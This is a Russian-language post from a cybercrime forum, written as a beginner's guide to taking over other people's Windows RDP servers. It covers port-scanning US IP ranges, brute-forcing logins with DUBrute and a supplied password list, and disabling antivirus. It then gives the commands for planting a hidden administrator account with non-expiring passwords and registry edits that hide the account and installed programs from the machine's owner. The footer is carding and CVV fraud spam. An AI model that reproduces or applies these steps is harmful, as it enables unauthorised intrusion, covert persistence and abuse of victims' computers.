If you have any questions, contact us:
Telegram:maintex
ICQ:1607000


Go Back   Cyber Security Forum > Russian Cybercrime Forum > Хакинг » Дедики » Хостинг > Статьи
Reload this Page Добыча дедиков [для новичков]
Register Info Community Today's Posts Search

Notices

Reply
 
Thread Tools Search this Thread
  #1 Old 05-06-2014, 06:54 PM
SemenUmen
 
SemenUmen's Avatar
 
Join Date: May 2014
Posts: 21
Contact: 2929260
SemenUmen is an unknown quantity at this point
Send a message via ICQ to SemenUmen Send a message via Skype™ to SemenUmen
Thumbs up Добыча дедиков [для новичков]
Добыча дедиков [для новичков]
• Что такое дедик
Слово «дедик», это сокращение англ. словa «dedicated».
Дедик – удаленный компьютер с открытым 3389 портом, который используется в протоколе RDP (Remote Desktop Protocol). Подключится к нему можно уже встроенными в Windows средствами :

Пуск > Выполнить > mstsc > Ок

Появится окно ввода данных и настройки для подключения к удаленной машине.
Объясню некоторые настройки.
В поле Компьютер нужно ввести IP дедика к которому хотите подключится.
В поле Пользователь можно (но не обязательно) вводить логин для подключения.
Далее жмете подключиться. У вас должно появиться окно Logon»а. Если вы заранее ввели имя пользователя, то остается только ввести пароль и войти.
Ещё ответ на вопрос который люди часто задают – «Как напрямую скопировать файлы с своего компьютера на дедик?»
Просто : в MSTSC окне сделайте следующее – Параметры > Локальные ресурсы > Подробнее > установите галочку там, откуда хотите копировать файлы (к примеру, диск C)
Учтите, что при подключении к дедику диск(и) которые вы включили, будут отображаться на удаленном компе как подключенные устройства.
На мой взгляд, проще залить нужные файлы на файлообменник и скачать с дедика.
Я думаю, этих знаний хватит для начала работы с дедиком.
• Для чего они создаются и зачем они мне
На этот вопрос нет конкретного ответа. Хозяева дедиков используют их в разных целях. От простого дополнительного компьютера до сервера какой нибудь игры или хранилища файлов. Это не принципиально, и ничего вам не даст, если вы будете серьезно заниматься дедиками, то вскоре заметите для чего в среднем используются удалёнки.
Вам же они могут понадобится по разным нуждам.
В основном брученные дедики интернет-пользователи используют для установки туда программ которым нужна долгая работа. Объясню проще, например вас не устраивает то что ваш брут/сканер на вашем компьютере, в связи с чем он включен круглосуточно и не дает вам спать. Дедик – это решение! Как правило дедики работают круглосуточно и ежедневно. Вы можете поставить туда свой софт, и спокойно спать.
Другие юзают дедики из-за небольшой скорости на своем компе, или из-за того что у них стоит лимитный тариф и программы вроде брута схвают много трафика за который потом не хочется платить. В общем, дедик, штука достаточно нужная и спрос на них есть.
• Сканирование компьютеров на открытые порт
Выше написанной инфы думаю достаточно чтобы иметь представление чем будем заниматься и зачем. Поэтому приступим к подготовке к бруту.
Чтобы к дедику можно было подключиться на нем должен быть открыт порт 3389. Соответственно для брута нам нужен список IP на которых открыт данный порт. Для того чтобы чекать IP на открытые порты есть огромное количество сканеров.

Я предпочитаю VNC Scanner GUI , его и будем использовать для сканирования портов. Скачать VNC Scanner GUI - Тык Вирустотал - ТЫК (я скачивал и проверял на ВТ эту программу много раз с разных источников,везде ВТ такой страшный :C ну качать или нет решать вам)


Обратите внимание на то что все хак-программы антивирусы не любят, и не дадут вам их ни скачать, ни запустить. Поэтому либо поставьте данные файлы в исключения антивируса , либо выключите его.
Теперь как скачали, распакуйте его куда ни-будь.
Сканер есть, теперь надо найти чего сканировать то будем.
Я использую для этого сайт ipaddresslocation.org .
Зайдем на него, ниже выберем страну из списка (берем USA) , поставим IP Ranges вместо CIDR, и нажмем Get IP Ranges.
Файл с диапазонами IP скачался. Откройте его и возьмите порядка 30 диапазонов. Откройте VNC Scanner GUI и вставьте в большое поле диапазоны которые скопировали. Жмете Start Scan и ждете пока диапазоны просканируются (процесс может занимать очень большое время, в зависимости от того сколько диапазонов и какой величины вы вставили).
После того как командное окно (черное) закроется, в сканере нажмите Start Parser (прога отпарсит насканеный файл и оставит только IP в файле IPs). Теперь у вас есть файл с IP на которых открыты порты, а это означает что они подходят под брут.
• Брутим дедики
Вот и подошли к последнему, и главному шагу.
На данный момент рабочие паблик бруты для дедиков можно посчитать по пальцам. Мы же будем использовать DUBrute 2.0 RC2. Объясню почему.
Дубрут вообще сейчас единственный рабочий, практически идеальный и главное паблик.

Его версий много, но как показывает практика 2.0 RC2 самая стабильная и не «бажная» версия. Я лично пользуюсь им, чего и вам советую. Скачать - Тык Вирустотал - ТЫК Для брута понадобится более менее хороший компьютер, скорость интернета от 500 кб/сек , и мозг конечно же.

Разархивируйте Дубрут. IP для брута у вас уже есть, теперь нужны логины и пароли, их вы можете найти в гугле (хорошие словари логинов/паролей вам никто не выложит, так что довольствуйтесь пабликом).
вот небольшая база
Спойлер:
administrator
Спойлер:

admin
adm
password
pass
passwd
pwd
qwerty
qwertyuiop
qwaszx
123
1234
12345
123456
12345678
123456789
1234567890
987654321
system
root

Создайте для них два файла (login и pass соответственно)
Перейдем к настройке брута. Откройте его и зайдите в Config. Оптимальное количество потоков вам придется подбирать под свой компьютер самим, но учтите, что не надо жадничать потоками если у вас слабый комп – скорость больше не станет, и брут будет работать не стабильно. У меня Celeron 2,4 ГГц , 2 Гб ОЗУ – на таком УГ я ставлю 30-50 потоков.
Try connections – поставьте 2
Timeout – поставьте 10-15
Конфиг настроен.
Заходите в Generation. Жмите File IP и выбирайте файл IPs (насканенные и отпарсенные IP). Для login и pass аналогично. Далее Make.
В принципе и всё. Если всё сделали как надо жмите Start.
Время брута зависит от кол-ва потоков и скорости интернета.



тут более "лёгкий"способ (не в плане добычи а в плане того что "мала букаф")

Для начала вам понадобиться скачать VNC scanner Gui и DuBrute (ссылки выше)
(1) Обучение добытия ip'ов.


1. Открываем папку vnc_scanner_gui, далее открываем программу vnc_scanner_gui.exe, выбираем нужную вам страну из списка, жмём Get diap list, выбираем нужное количество потоков, стандартно стоит 500 (рекомендую 1500).
2. Жмём Start Scan (появляется консольное окошко). - саму программу vnc_scanner_gui.exe при этом закрывать не нужно, просто сверните.
3. Ждём пока в FOUND (в общем количестве) будет 1000 или больше ипов (желательно), как только наберётся нужное количество,
закрываем это окошко, и жмём Start Parser в программе vnc_scanner_gui.exe, (создаётся файл: IPs.txt (в папке со сканером).


* После каждого нового скана ипов, в папке vnc_scanner_gui, нужно удалять файлы VNC-bypatch.txt и IPs.txt (после того, как скопируете ипы из этого файла, в файл ip.txt в папке DuBrute), после этого снова можно сканить.


(2) Обучение бруту дедов | RDP.


1. Открываем IPs.txt (создавшийся в папке vnc_scanner_gui, копируем его содержимое и вставляем в файл ip.txt (который находится в папке DuBrute).
2. Открываем DuBrute.exe --> жмём Config, выбираем сколько хотим Thread (потоки), у меня стоит от 200 до 300. Выбираем путь до файлов source.txt, bad.txt и good.txt (они в папке DuBrute). Жмём OK.
3. Выбираем Generation.
- File IP (выбираем ip.txt) - файл с ипами. (он в папке DuBrute).
- File Login (выбираем login.txt) - файл со списком логинов. (он в папке DuBrute).
- File Pass (выбираем pass.txt) - файл со списком паролей. (он в папке DuBrute).
4. Жмём Make, потом закрываем окошко и жмём START в самой программе DuBrute.


Всё, удачно сбрученные деды будут сохраняться в файл good.txt.


* После каждого нового сбручивания, необходимо очищать файлы: bad.txt, good.txt, source.txt и ip.txt. (предварительно скопировав все хорошие деды из good.txt в какой-либо другой текстовой документ).


Маскируемся на дедике
Как мы все с вами знаем,злой "дядя админ" тоже не спит,так что нужно скрывать своё прибывание на дедике если хотим сохранить его.Сейчас я вам расскажу о том как скрыться от админа.На самом деле всё проще паренный репы,но просто некоторым это делать лень,и на этом они и прокалываются.*И так,мы зашли на дедик,что дальше?
Для начало нам нужно создать свою учётную запись,так как если мы будем проделывать все свои чёрные дела под учёткой админа,то плакал наш дедик как только прийдёт админ и увидит что творится в его учётке.
Создавать учётку мы будем через командную строку,так как это быстрее и удобнее.И так,приступим к созданию учётки:
Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней следующее:
net user Имя_пользователя пароль /add
net localgroup Administrators Имя_пользователя /add
net localgroup "Remote Desktop Users" Имя_пользователя /add
net accounts /maxpwage:unlimited
Теперь давайте разберём каждую команду:
net user Имя_пользователя пароль /add - Добавляет нового пользователя с указанным именем и паролем
net localgroup Administrators Имя_пользователя /add - Добавляет нужного пользователя к группе администраторов
net localgroup "Remote Desktop Users" Имя_пользователя /add - Добавляет нужного пользователя к группе удалённых пользоваелей
net accounts /maxpwage:unlimited - позволяет избежать истечения срока действия пароля (14 дней)
Например если ты хочешь создать учётку с именем user и паролем password,то команды будут выглядеть так:
net user user password /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
Отлично,учётка создана.Теперь нам нужно её скрыть из винлогона,чтобы твоя учётка не светилась среди других пользователей.
Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWAREMi crosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.
Далее идём в Cocuments and Settings и скрываем там папку со своим акком со всеми подкаталогами и файлами. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)
И ещё создай себе папку в C:WINDOWSsystem32 или же глубже,и тоже сделай её скрытой со всеми файлами папками и подкаталогами.Она тебе будет нужна для того чтобы хранить там все нужные тебе файлы.
Всё,теперь у тебя есть скрытая учётка на дедике и папка,куда ты будешь пихать всё своё добро.Можешь смело дисконектится от дедика и заходить под своей учёткой. *Установил я прогу на дедике,как её скрыть?Советуется на дедик ничего не инсталлировать,а лить всё в установленном виде.Но если же тебе всё таки взбрело в голову заинсталить прогу на деде,то чтобы небыло лишних проблем,нужно скрыть её из Add or Remove programms.
Это делается тоже очень просто.Запускаем реестер,идём в HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersion Uninstall,там ищем название программы которую установили,и стираем все данные о проге.После этого нашу прогу видно не будет.
Ну вот вроде и всё о маскировке,всё о чём должен знать новичок.
SemenUmen is offline   Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz


Contact Us - Cyber Security Forum - Terms of Service - Top